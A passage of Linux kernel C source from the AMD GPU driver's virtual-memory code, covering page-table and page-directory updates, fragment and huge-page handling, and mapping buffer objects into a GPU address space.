amdgpu_vm_map_gart(params->pages_addr, addr) : addr; amdgpu_gmc_set_pte_pde(params->adev, (void *)(uintptr_t)pe, i, value, flags); addr += incr; } } static int amdgpu_vm_wait_pd(struct amdgpu_device *adev, struct amdgpu_vm *vm, void *owner) { struct amdgpu_sync sync; int r; amdgpu_sync_create(&sync); amdgpu_sync_resv(adev, &sync, vm->root.base.bo->tbo.resv, owner, false); r = amdgpu_sync_wait(&sync, true); amdgpu_sync_free(&sync); return r; } /* * amdgpu_vm_update_pde - update a single level in the hierarchy * * @params: parameters for the update * @vm: requested vm * @parent: parent directory * @entry: entry to update * * Makes sure the requested entry in parent is up to date. */ static void amdgpu_vm_update_pde(struct amdgpu_pte_update_params *params, struct amdgpu_vm *vm, struct amdgpu_vm_pt *parent, struct amdgpu_vm_pt *entry) { struct amdgpu_bo *bo = parent->base.bo, *pbo; uint64_t pde, pt, flags; unsigned level; /* Don't update huge pages here */ if (entry->huge) return; for (level = 0, pbo = bo->parent; pbo; ++level) pbo = pbo->parent; level += params->adev->vm_manager.root_level; pt = amdgpu_bo_gpu_offset(entry->base.bo); flags = AMDGPU_PTE_VALID; amdgpu_gmc_get_vm_pde(params->adev, level, &pt, &flags); pde = (entry - parent->entries) * 8; if (bo->shadow) params->func(params, bo->shadow, pde, pt, 1, 0, flags); params->func(params, bo, pde, pt, 1, 0, flags); } /* * amdgpu_vm_invalidate_level - mark all PD levels as invalid * * @parent: parent PD * * Mark all PD levels as invalid after an error. */ static void amdgpu_vm_invalidate_level(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_vm_pt *parent, unsigned level) { unsigned pt_idx, num_entries; /* * Recurse into the subdirectories. This recursion is harmless because * we only have a maximum of 5 layers. */ num_entries = amdgpu_vm_num_entries(adev, level); for (pt_idx = 0; pt_idx < num_entries; ++pt_idx) { struct amdgpu_vm_pt *entry = &parent->entries[pt_idx]; if (!entry->base.bo) continue; spin_lock(&vm->status_lock); if (list_empty(&entry->base.vm_status)) list_add(&entry->base.vm_status, &vm->relocated); spin_unlock(&vm->status_lock); amdgpu_vm_invalidate_level(adev, vm, entry, level + 1); } } /* * amdgpu_vm_update_directories - make sure that all directories are valid * * @adev: amdgpu_device pointer * @vm: requested vm * * Makes sure all directories are up to date. * Returns 0 for success, error for failure.
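 *
 * Note that when more directory entries need updating than fit into a single
 * IB, the partial job is submitted and the function restarts until the
 * relocated list is empty (see the "restart" label below).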
*/ int amdgpu_vm_update_directories(struct amdgpu_device *adev, struct amdgpu_vm *vm) { struct amdgpu_pte_update_params params; struct amdgpu_job *job; unsigned ndw = 0; int r = 0; if (list_empty(&vm->relocated)) return 0; restart: memset(&params, 0, sizeof(params)); params.adev = adev; if (vm->use_cpu_for_update) { r = amdgpu_vm_wait_pd(adev, vm, AMDGPU_FENCE_OWNER_VM); if (unlikely(r)) return r; params.func = amdgpu_vm_cpu_set_ptes; } else { ndw = 512 * 8; r = amdgpu_job_alloc_with_ib(adev, ndw * 4, &job); if (r) return r; params.ib = &job->ibs[0]; params.func = amdgpu_vm_do_set_ptes; } spin_lock(&vm->status_lock); while (!list_empty(&vm->relocated)) { struct amdgpu_vm_bo_base *bo_base, *parent; struct amdgpu_vm_pt *pt, *entry; struct amdgpu_bo *bo; bo_base = list_first_entry(&vm->relocated, struct amdgpu_vm_bo_base, vm_status); list_del_init(&bo_base->vm_status); spin_unlock(&vm->status_lock); bo = bo_base->bo->parent; if (!bo) { spin_lock(&vm->status_lock); continue; } parent = list_first_entry(&bo->va, struct amdgpu_vm_bo_base, bo_list); pt = container_of(parent, struct amdgpu_vm_pt, base); entry = container_of(bo_base, struct amdgpu_vm_pt, base); amdgpu_vm_update_pde(&params, vm, pt, entry); spin_lock(&vm->status_lock); if (!vm->use_cpu_for_update && (ndw - params.ib->length_dw) < 32) break; } spin_unlock(&vm->status_lock); if (vm->use_cpu_for_update) { /* Flush HDP */ mb(); amdgpu_asic_flush_hdp(adev, NULL); } else if (params.ib->length_dw == 0) { amdgpu_job_free(job); } else { struct amdgpu_bo *root = vm->root.base.bo; struct amdgpu_ring *ring; struct dma_fence *fence; ring = container_of(vm->entity.sched, struct amdgpu_ring, sched); amdgpu_ring_pad_ib(ring, params.ib); amdgpu_sync_resv(adev, &job->sync, root->tbo.resv, AMDGPU_FENCE_OWNER_VM, false); WARN_ON(params.ib->length_dw > ndw); r = amdgpu_job_submit(job, ring, &vm->entity, AMDGPU_FENCE_OWNER_VM, &fence); if (r) goto error; amdgpu_bo_fence(root, fence, true); dma_fence_put(vm->last_update); vm->last_update = fence; } if (!list_empty(&vm->relocated)) goto restart; return 0; error: amdgpu_vm_invalidate_level(adev, vm, &vm->root, adev->vm_manager.root_level); amdgpu_job_free(job); return r; } /** * amdgpu_vm_get_entry - find the entry for an address * * @p: see amdgpu_pte_update_params definition * @addr: virtual address in question * @entry: resulting entry or NULL * @parent: parent entry * * Find the vm_pt entry and its parent for the given address. */ void amdgpu_vm_get_entry(struct amdgpu_pte_update_params *p, uint64_t addr, struct amdgpu_vm_pt **entry, struct amdgpu_vm_pt **parent) { unsigned level = p->adev->vm_manager.root_level; *parent = NULL; *entry = &p->vm->root; while ((*entry)->entries) { unsigned shift = amdgpu_vm_level_shift(p->adev, level++); *parent = *entry; *entry = &(*entry)->entries[addr >> shift]; addr &= (1ULL << shift) - 1; } if (level != AMDGPU_VM_PTB) *entry = NULL; } /** * amdgpu_vm_handle_huge_pages - handle updating the PD with huge pages * * @p: see amdgpu_pte_update_params definition * @entry: vm_pt entry to check * @parent: parent entry * @nptes: number of PTEs updated with this operation * @dst: destination address where the PTEs should point to * @flags: access flags for the PTEs * * Check if we can update the PD with a huge page.
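 *
 * Worked example: with the default 9-bit block size a page table covers
 * AMDGPU_VM_PTE_COUNT = 512 entries of 4 KB each, so when one physically
 * contiguous range covers the whole PT, the PDE can map a single 2 MB huge
 * page (512 * 4 KB) instead of pointing to the PT.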
*/ static void amdgpu_vm_handle_huge_pages(struct amdgpu_pte_update_params *p, struct amdgpu_vm_pt *entry, struct amdgpu_vm_pt *parent, unsigned nptes, uint64_t dst, uint64_t flags) { uint64_t pde; /* In the case of a mixed PT the PDE must point to it*/ if (p->adev->asic_type >= CHIP_VEGA10 && !p->src && nptes == AMDGPU_VM_PTE_COUNT(p->adev)) { /* Set the huge page flag to stop scanning at this PDE */ flags |= AMDGPU_PDE_PTE; } if (!(flags & AMDGPU_PDE_PTE)) { if (entry->huge) { /* Add the entry to the relocated list to update it. */ entry->huge = false; spin_lock(&p->vm->status_lock); list_move(&entry->base.vm_status, &p->vm->relocated); spin_unlock(&p->vm->status_lock); } return; } entry->huge = true; amdgpu_gmc_get_vm_pde(p->adev, AMDGPU_VM_PDB0, &dst, &flags); pde = (entry - parent->entries) * 8; if (parent->base.bo->shadow) p->func(p, parent->base.bo->shadow, pde, dst, 1, 0, flags); p->func(p, parent->base.bo, pde, dst, 1, 0, flags); } /** * amdgpu_vm_update_ptes - make sure that page tables are valid * * @params: see amdgpu_pte_update_params definition * @vm: requested vm * @start: start of GPU address range * @end: end of GPU address range * @dst: destination address to map to, the next dst inside the function * @flags: mapping flags * * Update the page tables in the range @start - @end. * Returns 0 for success, -EINVAL for failure. */ static int amdgpu_vm_update_ptes(struct amdgpu_pte_update_params *params, uint64_t start, uint64_t end, uint64_t dst, uint64_t flags) { struct amdgpu_device *adev = params->adev; const uint64_t mask = AMDGPU_VM_PTE_COUNT(adev) - 1; uint64_t addr, pe_start; struct amdgpu_bo *pt; unsigned nptes; /* walk over the address space and update the page tables */ for (addr = start; addr < end; addr += nptes, dst += nptes * AMDGPU_GPU_PAGE_SIZE) { struct amdgpu_vm_pt *entry, *parent; amdgpu_vm_get_entry(params, addr, &entry, &parent); if (!entry) return -ENOENT; if ((addr & ~mask) == (end & ~mask)) nptes = end - addr; else nptes = AMDGPU_VM_PTE_COUNT(adev) - (addr & mask); amdgpu_vm_handle_huge_pages(params, entry, parent, nptes, dst, flags); /* We don't need to update PTEs for huge pages */ if (entry->huge) continue; pt = entry->base.bo; pe_start = (addr & mask) * 8; if (pt->shadow) params->func(params, pt->shadow, pe_start, dst, nptes, AMDGPU_GPU_PAGE_SIZE, flags); params->func(params, pt, pe_start, dst, nptes, AMDGPU_GPU_PAGE_SIZE, flags); } return 0; } /* * amdgpu_vm_frag_ptes - add fragment information to PTEs * * @params: see amdgpu_pte_update_params definition * @vm: requested vm * @start: first PTE to handle * @end: last PTE to handle * @dst: addr those PTEs should point to * @flags: hw mapping flags * Returns 0 for success, -EINVAL for failure. */ static int amdgpu_vm_frag_ptes(struct amdgpu_pte_update_params *params, uint64_t start, uint64_t end, uint64_t dst, uint64_t flags) { /** * The MC L1 TLB supports variable sized pages, based on a fragment * field in the PTE. When this field is set to a non-zero value, page * granularity is increased from 4KB to (1 << (12 + frag)). The PTE * flags are considered valid for all PTEs within the fragment range * and corresponding mappings are assumed to be physically contiguous. * * The L1 TLB can store a single PTE for the whole fragment, * significantly increasing the space available for translation * caching. This leads to large improvements in throughput when the * TLB is under pressure. * * The L2 TLB distributes small and large fragments into two * asymmetric partitions. 
The large fragment cache is significantly * larger. Thus, we try to use large fragments wherever possible. * Userspace can support this by aligning virtual base address and * allocation size to the fragment size. */ unsigned max_frag = params->adev->vm_manager.fragment_size; int r; /* system pages are not physically contiguous */ if (params->src || !(flags & AMDGPU_PTE_VALID)) return amdgpu_vm_update_ptes(params, start, end, dst, flags); while (start != end) { uint64_t frag_flags, frag_end; unsigned frag; /* This intentionally wraps around if no bit is set */ frag = min((unsigned)ffs(start) - 1, (unsigned)fls64(end - start) - 1); if (frag >= max_frag) { frag_flags = AMDGPU_PTE_FRAG(max_frag); frag_end = end & ~((1ULL << max_frag) - 1); } else { frag_flags = AMDGPU_PTE_FRAG(frag); frag_end = start + (1 << frag); } r = amdgpu_vm_update_ptes(params, start, frag_end, dst, flags | frag_flags); if (r) return r; dst += (frag_end - start) * AMDGPU_GPU_PAGE_SIZE; start = frag_end; } return 0; } /** * amdgpu_vm_bo_update_mapping - update a mapping in the vm page table * * @adev: amdgpu_device pointer * @exclusive: fence we need to sync to * @pages_addr: DMA addresses to use for mapping * @vm: requested vm * @start: start of mapped range * @last: last mapped entry * @flags: flags for the entries * @addr: addr to set the area to * @fence: optional resulting fence * * Fill in the page table entries between @start and @last. * Returns 0 for success, -EINVAL for failure. */ static int amdgpu_vm_bo_update_mapping(struct amdgpu_device *adev, struct dma_fence *exclusive, dma_addr_t *pages_addr, struct amdgpu_vm *vm, uint64_t start, uint64_t last, uint64_t flags, uint64_t addr, struct dma_fence **fence) { struct amdgpu_ring *ring; void *owner = AMDGPU_FENCE_OWNER_VM; unsigned nptes, ncmds, ndw; struct amdgpu_job *job; struct amdgpu_pte_update_params params; struct dma_fence *f = NULL; int r; memset(&params, 0, sizeof(params)); params.adev = adev; params.vm = vm; /* sync to everything on unmapping */ if (!(flags & AMDGPU_PTE_VALID)) owner = AMDGPU_FENCE_OWNER_UNDEFINED; if (vm->use_cpu_for_update) { /* params.src is used as flag to indicate system memory */ if (pages_addr) params.src = ~0; /* Wait for PT BOs to be free. PTs share the same resv. object * as the root PD BO */ r = amdgpu_vm_wait_pd(adev, vm, owner); if (unlikely(r)) return r; params.func = amdgpu_vm_cpu_set_ptes; params.pages_addr = pages_addr; return amdgpu_vm_frag_ptes(&params, start, last + 1, addr, flags); } ring = container_of(vm->entity.sched, struct amdgpu_ring, sched); nptes = last - start + 1; /* * reserve space for two commands every (1 << BLOCK_SIZE) * entries or 2k dwords (whatever is smaller) * * The second command is for the shadow pagetables. */ if (vm->root.base.bo->shadow) ncmds = ((nptes >> min(adev->vm_manager.block_size, 11u)) + 1) * 2; else ncmds = ((nptes >> min(adev->vm_manager.block_size, 11u)) + 1); /* padding, etc. */ ndw = 64; if (pages_addr) { /* copy commands needed */ ndw += ncmds * adev->vm_manager.vm_pte_funcs->copy_pte_num_dw; /* and also PTEs */ ndw += nptes * 2; params.func = amdgpu_vm_do_copy_ptes; } else { /* set page commands needed */ ndw += ncmds * 10; /* extra commands for begin/end fragments */ ndw += 2 * 10 * adev->vm_manager.fragment_size; params.func = amdgpu_vm_do_set_ptes; } r = amdgpu_job_alloc_with_ib(adev, ndw * 4, &job); if (r) return r; params.ib = &job->ibs[0]; if (pages_addr) { uint64_t *pte; unsigned i; /* Put the PTEs at the end of the IB.
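 * Each PTE is 8 bytes, i.e. two dwords, which is why nptes * 2 dwords were
 * reserved in ndw above and are carved off the IB tail here.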
*/ i = ndw - nptes * 2; pte = (uint64_t *)&(job->ibs->ptr[i]); params.src = job->ibs->gpu_addr + i * 4; for (i = 0; i < nptes; ++i) { pte[i] = amdgpu_vm_map_gart(pages_addr, addr + i * AMDGPU_GPU_PAGE_SIZE); pte[i] |= flags; } addr = 0; } r = amdgpu_sync_fence(adev, &job->sync, exclusive, false); if (r) goto error_free; r = amdgpu_sync_resv(adev, &job->sync, vm->root.base.bo->tbo.resv, owner, false); if (r) goto error_free; r = reservation_object_reserve_shared(vm->root.base.bo->tbo.resv); if (r) goto error_free; r = amdgpu_vm_frag_ptes(&params, start, last + 1, addr, flags); if (r) goto error_free; amdgpu_ring_pad_ib(ring, params.ib); WARN_ON(params.ib->length_dw > ndw); r = amdgpu_job_submit(job, ring, &vm->entity, AMDGPU_FENCE_OWNER_VM, &f); if (r) goto error_free; amdgpu_bo_fence(vm->root.base.bo, f, true); dma_fence_put(*fence); *fence = f; return 0; error_free: amdgpu_job_free(job); return r; } /** * amdgpu_vm_bo_split_mapping - split a mapping into smaller chunks * * @adev: amdgpu_device pointer * @exclusive: fence we need to sync to * @pages_addr: DMA addresses to use for mapping * @vm: requested vm * @mapping: mapped range and flags to use for the update * @flags: HW flags for the mapping * @nodes: array of drm_mm_nodes with the MC addresses * @fence: optional resulting fence * * Split the mapping into smaller chunks so that each update fits * into a SDMA IB. * Returns 0 for success, -EINVAL for failure. */ static int amdgpu_vm_bo_split_mapping(struct amdgpu_device *adev, struct dma_fence *exclusive, dma_addr_t *pages_addr, struct amdgpu_vm *vm, struct amdgpu_bo_va_mapping *mapping, uint64_t flags, struct drm_mm_node *nodes, struct dma_fence **fence) { unsigned min_linear_pages = 1 << adev->vm_manager.fragment_size; uint64_t pfn, start = mapping->start; int r; /* Normally bo_va->flags only contains the READABLE and WRITEABLE bits here, * but just in case we filter the flags again first */ if (!(mapping->flags & AMDGPU_PTE_READABLE)) flags &= ~AMDGPU_PTE_READABLE; if (!(mapping->flags & AMDGPU_PTE_WRITEABLE)) flags &= ~AMDGPU_PTE_WRITEABLE; flags &= ~AMDGPU_PTE_EXECUTABLE; flags |= mapping->flags & AMDGPU_PTE_EXECUTABLE; flags &= ~AMDGPU_PTE_MTYPE_MASK; flags |= (mapping->flags & AMDGPU_PTE_MTYPE_MASK); if ((mapping->flags & AMDGPU_PTE_PRT) && (adev->asic_type >= CHIP_VEGA10)) { flags |= AMDGPU_PTE_PRT; flags &= ~AMDGPU_PTE_VALID; } trace_amdgpu_vm_bo_update(mapping); pfn = mapping->offset >> PAGE_SHIFT; if (nodes) { while (pfn >= nodes->size) { pfn -= nodes->size; ++nodes; } } do { dma_addr_t *dma_addr = NULL; uint64_t max_entries; uint64_t addr, last; if (nodes) { addr = nodes->start << PAGE_SHIFT; max_entries = (nodes->size - pfn) * (PAGE_SIZE / AMDGPU_GPU_PAGE_SIZE); } else { addr = 0; max_entries = S64_MAX; } if (pages_addr) { uint64_t count; max_entries = min(max_entries, 16ull * 1024ull); for (count = 1; count < max_entries; ++count) { uint64_t idx = pfn + count; if (pages_addr[idx] != (pages_addr[idx - 1] + PAGE_SIZE)) break; } if (count < min_linear_pages) { addr = pfn << PAGE_SHIFT; dma_addr = pages_addr; } else { addr = pages_addr[pfn]; max_entries = count; } } else if (flags & AMDGPU_PTE_VALID) { addr += adev->vm_manager.vram_base_offset; addr += pfn << PAGE_SHIFT; } last = min((uint64_t)mapping->last, start + max_entries - 1); r = amdgpu_vm_bo_update_mapping(adev, exclusive, dma_addr, vm, start, last, flags, addr, fence); if (r) return r; pfn += last - start + 1; if (nodes && nodes->size == pfn) { pfn = 0; ++nodes; } start = last + 1; } while (unlikely(start !=
mapping->last + 1)); return 0; } /** * amdgpu_vm_bo_update - update all BO mappings in the vm page table * * @adev: amdgpu_device pointer * @bo_va: requested BO and VM object * @clear: if true clear the entries * * Fill in the page table entries for @bo_va. * Returns 0 for success, -EINVAL for failure. */ int amdgpu_vm_bo_update(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, bool clear) { struct amdgpu_bo *bo = bo_va->base.bo; struct amdgpu_vm *vm = bo_va->base.vm; struct amdgpu_bo_va_mapping *mapping; dma_addr_t *pages_addr = NULL; struct ttm_mem_reg *mem; struct drm_mm_node *nodes; struct dma_fence *exclusive, **last_update; uint64_t flags; int r; if (clear || !bo_va->base.bo) { mem = NULL; nodes = NULL; exclusive = NULL; } else { struct ttm_dma_tt *ttm; mem = &bo_va->base.bo->tbo.mem; nodes = mem->mm_node; if (mem->mem_type == TTM_PL_TT) { ttm = container_of(bo_va->base.bo->tbo.ttm, struct ttm_dma_tt, ttm); pages_addr = ttm->dma_address; } exclusive = reservation_object_get_excl(bo->tbo.resv); } if (bo) flags = amdgpu_ttm_tt_pte_flags(adev, bo->tbo.ttm, mem); else flags = 0x0; if (clear || (bo && bo->tbo.resv == vm->root.base.bo->tbo.resv)) last_update = &vm->last_update; else last_update = &bo_va->last_pt_update; if (!clear && bo_va->base.moved) { bo_va->base.moved = false; list_splice_init(&bo_va->valids, &bo_va->invalids); } else if (bo_va->cleared != clear) { list_splice_init(&bo_va->valids, &bo_va->invalids); } list_for_each_entry(mapping, &bo_va->invalids, list) { r = amdgpu_vm_bo_split_mapping(adev, exclusive, pages_addr, vm, mapping, flags, nodes, last_update); if (r) return r; } if (vm->use_cpu_for_update) { /* Flush HDP */ mb(); amdgpu_asic_flush_hdp(adev, NULL); } spin_lock(&vm->status_lock); list_del_init(&bo_va->base.vm_status); spin_unlock(&vm->status_lock); list_splice_init(&bo_va->invalids, &bo_va->valids); bo_va->cleared = clear; if (trace_amdgpu_vm_bo_mapping_enabled()) { list_for_each_entry(mapping, &bo_va->valids, list) trace_amdgpu_vm_bo_mapping(mapping); } return 0; } /** * amdgpu_vm_update_prt_state - update the global PRT state */ static void amdgpu_vm_update_prt_state(struct amdgpu_device *adev) { unsigned long flags; bool enable; spin_lock_irqsave(&adev->vm_manager.prt_lock, flags); enable = !!atomic_read(&adev->vm_manager.num_prt_users); adev->gmc.gmc_funcs->set_prt(adev, enable); spin_unlock_irqrestore(&adev->vm_manager.prt_lock, flags); } /** * amdgpu_vm_prt_get - add a PRT user */ static void amdgpu_vm_prt_get(struct amdgpu_device *adev) { if (!adev->gmc.gmc_funcs->set_prt) return; if (atomic_inc_return(&adev->vm_manager.num_prt_users) == 1) amdgpu_vm_update_prt_state(adev); } /** * amdgpu_vm_prt_put - drop a PRT user */ static void amdgpu_vm_prt_put(struct amdgpu_device *adev) { if (atomic_dec_return(&adev->vm_manager.num_prt_users) == 0) amdgpu_vm_update_prt_state(adev); } /** * amdgpu_vm_prt_cb - callback for updating the PRT status */ static void amdgpu_vm_prt_cb(struct dma_fence *fence, struct dma_fence_cb *_cb) { struct amdgpu_prt_cb *cb = container_of(_cb, struct amdgpu_prt_cb, cb); amdgpu_vm_prt_put(cb->adev); kfree(cb); } /** * amdgpu_vm_add_prt_cb - add callback for updating the PRT status */ static void amdgpu_vm_add_prt_cb(struct amdgpu_device *adev, struct dma_fence *fence) { struct amdgpu_prt_cb *cb; if (!adev->gmc.gmc_funcs->set_prt) return; cb = kmalloc(sizeof(struct amdgpu_prt_cb), GFP_KERNEL); if (!cb) { /* Last resort when we are OOM */ if (fence) dma_fence_wait(fence, false); amdgpu_vm_prt_put(adev); } else { cb->adev = adev; if 
(!fence || dma_fence_add_callback(fence, &cb->cb, amdgpu_vm_prt_cb)) amdgpu_vm_prt_cb(fence, &cb->cb); } } /** * amdgpu_vm_free_mapping - free a mapping * * @adev: amdgpu_device pointer * @vm: requested vm * @mapping: mapping to be freed * @fence: fence of the unmap operation * * Free a mapping and make sure we decrease the PRT usage count if applicable. */ static void amdgpu_vm_free_mapping(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_bo_va_mapping *mapping, struct dma_fence *fence) { if (mapping->flags & AMDGPU_PTE_PRT) amdgpu_vm_add_prt_cb(adev, fence); kfree(mapping); } /** * amdgpu_vm_prt_fini - finish all prt mappings * * @adev: amdgpu_device pointer * @vm: requested vm * * Register a cleanup callback to disable PRT support after VM dies. */ static void amdgpu_vm_prt_fini(struct amdgpu_device *adev, struct amdgpu_vm *vm) { struct reservation_object *resv = vm->root.base.bo->tbo.resv; struct dma_fence *excl, **shared; unsigned i, shared_count; int r; r = reservation_object_get_fences_rcu(resv, &excl, &shared_count, &shared); if (r) { /* Not enough memory to grab the fence list, as last resort * block for all the fences to complete. */ reservation_object_wait_timeout_rcu(resv, true, false, MAX_SCHEDULE_TIMEOUT); return; } /* Add a callback for each fence in the reservation object */ amdgpu_vm_prt_get(adev); amdgpu_vm_add_prt_cb(adev, excl); for (i = 0; i < shared_count; ++i) { amdgpu_vm_prt_get(adev); amdgpu_vm_add_prt_cb(adev, shared[i]); } kfree(shared); } /** * amdgpu_vm_clear_freed - clear freed BOs in the PT * * @adev: amdgpu_device pointer * @vm: requested vm * @fence: optional resulting fence (unchanged if no work needed to be done * or if an error occurred) * * Make sure all freed BOs are cleared in the PT. * Returns 0 for success. * * PTs have to be reserved and mutex must be locked! */ int amdgpu_vm_clear_freed(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct dma_fence **fence) { struct amdgpu_bo_va_mapping *mapping; uint64_t init_pte_value = 0; struct dma_fence *f = NULL; int r; while (!list_empty(&vm->freed)) { mapping = list_first_entry(&vm->freed, struct amdgpu_bo_va_mapping, list); list_del(&mapping->list); if (vm->pte_support_ats && mapping->start < AMDGPU_VA_HOLE_START) init_pte_value = AMDGPU_PTE_DEFAULT_ATC; r = amdgpu_vm_bo_update_mapping(adev, NULL, NULL, vm, mapping->start, mapping->last, init_pte_value, 0, &f); amdgpu_vm_free_mapping(adev, vm, mapping, f); if (r) { dma_fence_put(f); return r; } } if (fence && f) { dma_fence_put(*fence); *fence = f; } else { dma_fence_put(f); } return 0; } /** * amdgpu_vm_handle_moved - handle moved BOs in the PT * * @adev: amdgpu_device pointer * @vm: requested vm * @sync: sync object to add fences to * * Make sure all BOs which are moved are updated in the PTs. * Returns 0 for success. * * PTs have to be reserved! 
*/ int amdgpu_vm_handle_moved(struct amdgpu_device *adev, struct amdgpu_vm *vm) { bool clear; int r = 0; spin_lock(&vm->status_lock); while (!list_empty(&vm->moved)) { struct amdgpu_bo_va *bo_va; struct reservation_object *resv; bo_va = list_first_entry(&vm->moved, struct amdgpu_bo_va, base.vm_status); spin_unlock(&vm->status_lock); resv = bo_va->base.bo->tbo.resv; /* Per VM BOs never need to be cleared in the page tables */ if (resv == vm->root.base.bo->tbo.resv) clear = false; /* Try to reserve the BO to avoid clearing its ptes */ else if (!amdgpu_vm_debug && reservation_object_trylock(resv)) clear = false; /* Somebody else is using the BO right now */ else clear = true; r = amdgpu_vm_bo_update(adev, bo_va, clear); if (r) return r; if (!clear && resv != vm->root.base.bo->tbo.resv) reservation_object_unlock(resv); spin_lock(&vm->status_lock); } spin_unlock(&vm->status_lock); return r; } /** * amdgpu_vm_bo_add - add a bo to a specific vm * * @adev: amdgpu_device pointer * @vm: requested vm * @bo: amdgpu buffer object * * Add @bo into the requested vm. * Add @bo to the list of bos associated with the vm * Returns newly added bo_va or NULL for failure * * Object has to be reserved! */ struct amdgpu_bo_va *amdgpu_vm_bo_add(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_bo *bo) { struct amdgpu_bo_va *bo_va; bo_va = kzalloc(sizeof(struct amdgpu_bo_va), GFP_KERNEL); if (bo_va == NULL) { return NULL; } bo_va->base.vm = vm; bo_va->base.bo = bo; INIT_LIST_HEAD(&bo_va->base.bo_list); INIT_LIST_HEAD(&bo_va->base.vm_status); bo_va->ref_count = 1; INIT_LIST_HEAD(&bo_va->valids); INIT_LIST_HEAD(&bo_va->invalids); if (!bo) return bo_va; list_add_tail(&bo_va->base.bo_list, &bo->va); if (bo->tbo.resv != vm->root.base.bo->tbo.resv) return bo_va; if (bo->preferred_domains & amdgpu_mem_type_to_domain(bo->tbo.mem.mem_type)) return bo_va; /* * We checked all the prerequisites, but it looks like this per VM BO * is currently evicted. Add the BO to the evicted list to make sure it * is validated on next VM use to avoid fault. */ spin_lock(&vm->status_lock); list_move_tail(&bo_va->base.vm_status, &vm->evicted); spin_unlock(&vm->status_lock); return bo_va; } /** * amdgpu_vm_bo_insert_map - insert a new mapping * * @adev: amdgpu_device pointer * @bo_va: bo_va to store the address * @mapping: the mapping to insert * * Insert a new mapping into all structures. */ static void amdgpu_vm_bo_insert_map(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, struct amdgpu_bo_va_mapping *mapping) { struct amdgpu_vm *vm = bo_va->base.vm; struct amdgpu_bo *bo = bo_va->base.bo; mapping->bo_va = bo_va; list_add(&mapping->list, &bo_va->invalids); amdgpu_vm_it_insert(mapping, &vm->va); if (mapping->flags & AMDGPU_PTE_PRT) amdgpu_vm_prt_get(adev); if (bo && bo->tbo.resv == vm->root.base.bo->tbo.resv) { spin_lock(&vm->status_lock); if (list_empty(&bo_va->base.vm_status)) list_add(&bo_va->base.vm_status, &vm->moved); spin_unlock(&vm->status_lock); } trace_amdgpu_vm_bo_map(bo_va, mapping); } /** * amdgpu_vm_bo_map - map bo inside a vm * * @adev: amdgpu_device pointer * @bo_va: bo_va to store the address * @saddr: where to map the BO * @offset: requested offset in the BO * @flags: attributes of pages (read/write/valid/etc.) * * Add a mapping of the BO at the specified addr into the VM. * Returns 0 for success, error for failure. * * Object has to be reserved and unreserved outside!
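 *
 * Example (sketch with illustrative values): mapping the first 2 MB of a BO
 * read/write at VA 0x100000, using flags that appear elsewhere in this file:
 *
 *   r = amdgpu_vm_bo_map(adev, bo_va, 0x100000, 0, 0x200000,
 *                        AMDGPU_PTE_READABLE | AMDGPU_PTE_WRITEABLE);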
*/ int amdgpu_vm_bo_map(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, uint64_t saddr, uint64_t offset, uint64_t size, uint64_t flags) { struct amdgpu_bo_va_mapping *mapping, *tmp; struct amdgpu_bo *bo = bo_va->base.bo; struct amdgpu_vm *vm = bo_va->base.vm; uint64_t eaddr; /* validate the parameters */ if (saddr & AMDGPU_GPU_PAGE_MASK || offset & AMDGPU_GPU_PAGE_MASK || size == 0 || size & AMDGPU_GPU_PAGE_MASK) return -EINVAL; /* make sure object fit at this offset */ eaddr = saddr + size - 1; if (saddr >= eaddr || (bo && offset + size > amdgpu_bo_size(bo))) return -EINVAL; saddr /= AMDGPU_GPU_PAGE_SIZE; eaddr /= AMDGPU_GPU_PAGE_SIZE; tmp = amdgpu_vm_it_iter_first(&vm->va, saddr, eaddr); if (tmp) { /* bo and tmp overlap, invalid addr */ dev_err(adev->dev, "bo %p va 0x%010Lx-0x%010Lx conflict with " "0x%010Lx-0x%010Lx\n", bo, saddr, eaddr, tmp->start, tmp->last + 1); return -EINVAL; } mapping = kmalloc(sizeof(*mapping), GFP_KERNEL); if (!mapping) return -ENOMEM; mapping->start = saddr; mapping->last = eaddr; mapping->offset = offset; mapping->flags = flags; amdgpu_vm_bo_insert_map(adev, bo_va, mapping); return 0; } /** * amdgpu_vm_bo_replace_map - map bo inside a vm, replacing existing mappings * * @adev: amdgpu_device pointer * @bo_va: bo_va to store the address * @saddr: where to map the BO * @offset: requested offset in the BO * @flags: attributes of pages (read/write/valid/etc.) * * Add a mapping of the BO at the specified addr into the VM. Replace existing * mappings as we do so. * Returns 0 for success, error for failure. * * Object has to be reserved and unreserved outside! */ int amdgpu_vm_bo_replace_map(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, uint64_t saddr, uint64_t offset, uint64_t size, uint64_t flags) { struct amdgpu_bo_va_mapping *mapping; struct amdgpu_bo *bo = bo_va->base.bo; uint64_t eaddr; int r; /* validate the parameters */ if (saddr & AMDGPU_GPU_PAGE_MASK || offset & AMDGPU_GPU_PAGE_MASK || size == 0 || size & AMDGPU_GPU_PAGE_MASK) return -EINVAL; /* make sure object fit at this offset */ eaddr = saddr + size - 1; if (saddr >= eaddr || (bo && offset + size > amdgpu_bo_size(bo))) return -EINVAL; /* Allocate all the needed memory */ mapping = kmalloc(sizeof(*mapping), GFP_KERNEL); if (!mapping) return -ENOMEM; r = amdgpu_vm_bo_clear_mappings(adev, bo_va->base.vm, saddr, size); if (r) { kfree(mapping); return r; } saddr /= AMDGPU_GPU_PAGE_SIZE; eaddr /= AMDGPU_GPU_PAGE_SIZE; mapping->start = saddr; mapping->last = eaddr; mapping->offset = offset; mapping->flags = flags; amdgpu_vm_bo_insert_map(adev, bo_va, mapping); return 0; } /** * amdgpu_vm_bo_unmap - remove bo mapping from vm * * @adev: amdgpu_device pointer * @bo_va: bo_va to remove the address from * @saddr: where the BO is mapped * * Remove a mapping of the BO at the specified addr from the VM. * Returns 0 for success, error for failure. * * Object has to be reserved and unreserved outside!
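 *
 * Example (sketch, undoing the mapping shown above):
 *
 *   r = amdgpu_vm_bo_unmap(adev, bo_va, 0x100000);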
